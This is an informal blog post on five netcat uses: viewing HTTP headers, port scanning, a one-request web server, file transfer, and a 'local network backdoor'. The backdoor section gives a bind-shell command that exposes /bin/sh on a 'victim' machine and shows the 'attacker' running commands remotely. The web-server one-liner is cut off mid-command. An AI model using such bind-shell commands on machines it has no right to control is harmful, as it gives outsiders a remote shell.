5 Cool Things to Do With `netcat'

| Comments

I heard somewhere about ‘netcat’ being the swiss-army-knife for networking. Looking through its man pages I tried many commands as I could understand them, but still remained unimpressed. But so many wise people calling netcat ‘the awesome’ can’t be wrong, right! So I went through lengths and surfed  the Internets, grep’d some ebooks on networking, re-read its man pages and forced myself to get impressed.
Here is a list of cool things I could figure out to be done with netcat. I am sure there are more my puny brain couldn’t discover. Hugs and kisses for all (females) who will tell ‘em in comments.

Banner grabbing / Displaying user-agent for the request

 netcat -lp 6969
So basically netcat is ‘cat’ for the net(work). It directly reads and writes data over the network. Sounds good for peeking at ‘HTTP’ headers? To me at least. This is the only thing I use netcat for on daily basis. Many of my tasks involve making crawlers, and netcat is the first tool I use for exploring how my crawlers behave to servers.
Most of the times I am interested in inspecting the ‘User Agent’ header, but above command dumps a lot more information about the HTTP headers.
Here’s an excerpt:
GET / HTTP/1.1
Host: 127.0.0.1:9999
Accept-Language: en
Accept-Encoding: x-gzip,gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Scrapy/0.20.0 (+http://scrapy.org)

Using netcat as a port scanner

nc -zp 9090 localhost 8000-9000 -v
Netcat can help in finding out the open ports on our machine. Yes and yes. There are better tools available for this job and they are more efficient. I can’t guess why to nc for this. May be because it can be used like this, or because netcat is installed by default on most machines and nmap is not.
Here’s an excerpt when a ‘twisted’ http server was running on my machine.
localhost [127.0.0.1] 8080 (http-alt) open

Netcat as a simple local network backdoor

This is another one of my favorites. Making backdoors was never this simple. Although this only worked on local network, but it’s kind of cool. I think with little more effort this can be made to work from outside the LAN as well, may with tunneling (nc -L) or something. I am too tired to do any more research. Please enlighten me if you can do it. Here’s how I did it on my LAN.

On victim machine run

 nc -e “/bin/sh” 127.0.0.1 -lp 8080
‘nc -e’ executes any program on the local machine. I tried running python and ruby scripts, and even installing software with ‘pacman’ by running similar command on one machine and then making a request with ‘curl’ and even with firefox from other machine.

On attacker machine send commands with

nc
e.g nc ls -a
This will run a session in which a command is executed and its stdout shown. Here’s an excerpt from one of those I tried.

nc 127.0.0.1 8080
echo $SHELL
/bin/zsh
whoami
channi
pwd 
/home/channi
ls /media/
E
F
cd /media/E
pwd
/media/E
ls
e Books
Games
Images
Movies
Music

Using netcat as a single request web server

{ echo -ne “HTTP/1.0 200 OK\r\nContent-Length: $(wc -c
You don’t need to be a $BASH wiz to understand this one. It simply outputs the basic HTTP headers and calculated content length of a file to the netcat which then listens on port 8080. It gets served to whoever reaches localhost:8080 first. Yup! First come first serve. This server works for a single request only, and I din’t try it over the Internet. 

Using netcat as a listener

cat afile.txt | nc 127.0.0.1 9999
nc -l 127.0.0.1 9999 > log.txt
Netcat can be used as a listener (as it is being used in first point) and stuff can be sent over network as in commands above. The second command must be run on a recipient machine and first from sender machine. A file can be sent this way.

Yes I din’t properly research for this post. I don’t like writing half-assed posts but I have to stay with my new-year resolution of writing a-post-a-day. All the enlightened souls please bless me with your wisdom in comments. Specially anything about making nc persist multiple requests without scripting it with bash, python or anything.

Comments